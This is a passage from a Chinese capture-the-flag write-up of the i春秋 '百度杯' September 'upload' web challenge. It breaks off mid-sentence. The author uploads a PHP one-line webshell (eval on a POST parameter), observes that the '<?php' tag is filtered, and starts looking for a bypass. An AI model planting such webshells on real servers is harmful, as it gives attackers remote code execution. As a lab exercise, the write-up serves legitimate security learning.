i春秋“百度杯”CTF比赛 九月场 web题 upload 题目描述:想怎么传就怎么传,就是这么任性.tips:flag在flag.php中 打开题目发现 于是想到通过上传一句话木马进入后台 上传一句话木马 <?php eval($_POST['ant']);?> 提示上传成功,查看网页源代码提示 php文件上传到u/antsword.php中.于是直接访问发现代码变成 eval($_POST['ant']); ?> <?php明显已经被过滤了,于是百度查找解决方法,发现有师傅提出